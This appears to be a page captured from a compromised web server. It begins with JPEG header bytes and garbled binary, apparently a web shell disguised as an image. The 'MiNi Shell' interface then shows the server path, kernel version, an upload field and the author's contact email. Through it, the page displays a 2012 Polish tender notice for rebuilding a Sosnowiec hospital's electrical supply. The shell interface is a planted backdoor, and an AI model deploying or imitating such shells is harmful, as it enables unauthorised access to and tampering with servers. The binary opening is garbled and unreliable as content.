JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20120412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20120412/115796-N-2012.html

<p class="kh_header"><b>Sosnowiec: Przebudowa układu zasilania w energię elektryczną w budynkach szpitala 
przy ul. Szpitalnej 1</b><br>
<b>Numer ogłoszenia: 115796 - 2012; data zamieszczenia: 12.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 32 41 30 111, faks 32 41 30 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa układu zasilania w energię elektryczną w budynkach szpitala 
przy ul. Szpitalnej 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia są roboty budowlane związane z wykonaniem zadania pn. Przebudowa układu zasilania w energię elektryczną, w budynkach szpitalnych przy ul. Szpitalnej 1 w Sosnowcu w oparciu o dokumentację projektową.
Zamówienie realizowane jest w ramach dotacji Gminy WZO.D 02 12 z dnia 20.01.2012r. załącznik 1, pkt 6, pn: Przebudowa układu zasilania w energię elektryczną, w budynkach szpitalnych przy ul. Szpitalnej 1. 
2. W ramach realizacji przedmiotu zamówienia Wykonawca będzie zobowiązany wykonać roboty budowlane związane z przebudową układu  zasilnia w energię elektryczną Szpitala Miejskiego w Sosnowcu zlokalizowanego na ul. Szpitalnej 1 obejmującego  rozdzielnię  główną RG,  dostawę  i  zabudowę  agregatu prądotwórczego, wymianę linii  kablowej  zasilającej  rozdzielni  R2,  rozdzielni  wewnątrz  budynkowych  R1,  R2  oraz nadrzędnego układu sterowania obejmujące:

Remont i adaptację pomieszczeń dla potrzeb modernizacji układu zasilania obiektów szpitala przy ul. Szpitalnej 1: 
-   pomieszczenia agregatu prądotwórczego w budynku technicznym; 
-  pomieszczenie rozdzielni R1, pawilonie głównym szpitala; 
-  pomieszczenie rozdzielni R2, w dawnym pawilonie kardiologicznym szpitala; 
Roboty instalacyjne; 
Roboty wykończeniowe; 
Budowa linii kablowych średniego i niskiego napięcia; 
Budowa kanalizacji kablowej; 
Montaż i demontaż rozdzielnic elektrycznych średniego i niskiego napięcia; 
Prace pomiarowe instalacji elektrycznej.

3.	 Roboty budowlane wykonywane będą na terenie zabytkowego parku - zabytku nieruchomego wpisanego do rejestru zabytków Śląskiego Wojewódzkiego Konserwatora Zabytków w Katowicach pod nr A 703 63. 

4.	 Wymagania techniczne oraz wszystkie szczegóły dotyczące wykonania robót określają  Specyfikacje Techniczne Wykonania i Odbioru Robót, które stanowią  załączniki  do niniejszej  SIWZ.
5. Podane w dokumentacji projektowej, STWiOR i Przedmiarach przez Zamawiającego nazwy (znaki towarowe), mają charakter przykładowy a ich wskazanie ma na celu określenie oczekiwanego standardu, przy czym Zamawiający dopuszcza składanie ofert równoważnych. Przez ofertę równoważną należy rozumieć taką, która przedstawia opis przedmiotu zamówienia o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych, spełniających minimalne parametry określone przez Zamawiającego, lecz oznaczoną innym znakiem towarowym, patentem lub pochodzeniem. 
6. Zamawiający ustala zebranie Wykonawców w 18.04.2012r. o godz. 1000 w siedzibie Zamawiającego przy ul. Zegadłowicza 3 (Dział Realizacji Inwestycji) celem przeprowadzenia wizji lokalnej. Na wniosek Wykonawców Zamawiający dopuszcza zebranie w innym terminie jednakże nie późniejszym jednak niż na 5 dni przed datą otwarcia ofert. Termin inny niż wskazany wyżej zostanie zamieszczony na stronie internetowej Zamawiającego w informacjach dotyczących przedmiotowego postępowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających określonych w art. 67 ust. 1, pkt. 6 ustawy Pzp polegających na modernizacji układu pomiarowego zasilania w energię elektryczną w obiekcie Szpitala przy ul. Szpitalnej 1 w wysokości do 50% zamówienia podstawowego. Zgodnie z dokonaną wyceną na dzień wszczęcia postępowania wartość zamówienia uzupełniającego wynosi 5% kwoty zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający dokona oceny spełniania tego warunku na podstawie przedłożonego przez Wykonawcę wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, z którego wynika, że Wykonawca dysponuje odpowiednią kadrą kierowniczą odpowiedzialną za realizację zamówienia w tym kierownik budowy - uprawnienia budowlane z zakresu instalacji elektrycznych określone § 24 Rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U. Nr 83, poz. 578 z późn. zm.) i posiadanie co najmniej 2- letniej praktyki wykonywania robót przy zabytkach, zgodnie z art. 24 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dn. 27 lipca 2011r.( Dz. U. nr 165 poz. 987).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- oświadczenie według załącznika nr 2 do SIWZ.
- wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, zgodnie z zakresem w pkt. 1b rozdziału IV SIWZ tj. 
 - Zamawiający dokona oceny spełniania tego warunku na podstawie przedłożonego przez Wykonawcę wykazu wykonanych robót, z którego wynika, że  w  okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie zostały wykonane co najmniej 2 roboty budowlane o wartości nie mniejszej niż 1 000 000,00 zł brutto każda polegające na budowie lub przebudowie lub modernizacji układu zasilania w energię elektryczną tj. rozdzielnie średniego napięcia, niskiego napięcia, wyposażony w system automatycznego załączania rezerwy dla budynków użyteczności publicznej. W wykazie należy podać wartości, daty i miejsca wykonania robót wraz z dołączonymi dokumentami, potwierdzającymi należyte ich wykonanie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z zakresem w pkt. 1c rozdziału IV SIWZ tj.

- Zamawiający dokona oceny spełniania tego warunku na podstawie przedłożonego przez Wykonawcę wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, z którego wynika, że Wykonawca dysponuje odpowiednią kadrą kierowniczą odpowiedzialną za realizację zamówienia w tym kierownik budowy - uprawnienia budowlane z zakresu instalacji elektrycznych określone § 24 Rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U. Nr 83, poz. 578 z późn. zm.) i posiadanie co najmniej 2- letniej praktyki wykonywania robót przy zabytkach, zgodnie z art. 24 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dn. 27 lipca 2011r.( Dz. U. nr 165 poz. 987).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy  wg wzoru stanowiącego załącznik nr 1 do SIWZ.
- formularz oświadczeń wg wzoru stanowiącego załącznik nr 2 do SIWZ.
- formularz - wykaz wykonanych robót wg wzoru stanowiącego załącznik nr 4 do SIWZ.
- formularz - wykaz osób wg wzoru stanowiącego załącznik nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2. Wprowadzone zmiany mogą dotyczyć umówionego terminu wykonania zamówienia: 
  a.   z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych    
            polegających na niezgodności dokumentacji z przepisami prawa, 
b.  z powodu wystąpienia dodatkowych robót, a niemożliwych do przewidzenia przed   
     zawarciem umowy, 
 c. działania siły wyższej, zmiany spowodowane warunkami atmosferycznymi, w  
      szczególności klęski żywiołowe, warunki atmosferyczne uniemożliwiające 
     prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie 
     odbiorów, brak możliwości dojazdu do obiektu, 
d.	z powodu opóźnienia przez Zamawiającego przekazania terenu budowy w terminach określonych w §5 ust.1,   
e.	z powodu opóźnienia w realizacji robót, które wynikły z tytułu znalezienia zabytku,
f.	okoliczności, których nie można było przewidzieć.
3. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów, Wykonawca winien poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
4. Zmiany będące następstwem okoliczności leżących po stronie zamawiającego w   
    szczególności: 
   a.   wstrzymanie robót przez zamawiającego z przyczyn nie dotyczących Wykonawcy, 
   b.   konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej, 
      c.    przekazanie placu budowy z opóźnieniem, 
   d.  przyczyn zależnych od Zamawiającego np. opóźnienie w przekazaniu frontu robót,   
        czasowe przerwanie prac z uwagi na konieczność koordynacji robót z innymi  
        zadaniami inwestycyjnymi prowadzonymi w obiekcie przy ul. Szpitalnej 1;
   e.  zmiany będące następstwem działania organów administracji tj.: przyczyny zewnętrzne    
        niezależne od zamawiającego i wykonawcy skutkujące niemożliwością uzyskania 
        stosownych decyzji, zezwoleń, uzgodnień itp. - mogą spowodować, że termin 
        wykonania umowy ulegnie odpowiedniemu przedłużeniu o czas niezbędny do 
        zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak jak o 
        okres trwania tych okoliczności. Ciężar udowodnienia faktu w takim układzie 
        spoczywa na Wykonawcy przedmiotowego zamówienia. 
 5.  Zamawiający dopuszcza możliwość zmian osobowych:
         a. inspektora nadzoru w trakcie realizacji zadania, z przyczyn niezależnych od 
             Zamawiającego lub z przyczyn losowych,
         b. osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne 
             legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o 
             których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ. 
 6.  Wykonawca może dokonać zmiany osób przedstawionych w ofercie, jedynie za 
             uprzednią zgodą Zamawiającego w przypadkach: 
   a.  zdarzeń losowych osób, 
   b.  nie wywiązywania się osób z obowiązków wynikających z umowy,
         c.  z przyczyn niezależnych od Wykonawcy.
  7.  Dopuszcza się zmianę wynagrodzenia w następujących przypadkach:
         a.  wystąpienia robót dodatkowych i rozwiązań zamiennych o których mowa w §12, 
         b. zmniejszenia bądź zwiększenia ilości robót wynikających z rzeczywistych obmiarów, 
             które spowodują zmianę wartości umowy,
         c. zmiany technologii robót, która spowoduje zmianę ceny, a cena ta będzie korzystna    
            dla Zamawiającego.
        d. ustawowej zmiany stawki podatku VAT.
8. Wszelkie zmiany z wyłączeniem §3 ust. 6 i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych
9.  Wyklucza się takie zmiany umowy, które byłyby niekorzystne dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że konieczność takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili jej zawarcia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl zakładka zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu, 
       41-219 Sosnowiec, ul. Szpitalna 1, w Dziale Zamówień Publicznych i Zawierania Umów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2012 godzina 10:00, miejsce: Samodzielny Publiczny Szpital Miejski w Sosnowcu, 
       41-219 Sosnowiec, ul. Szpitalna 1, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com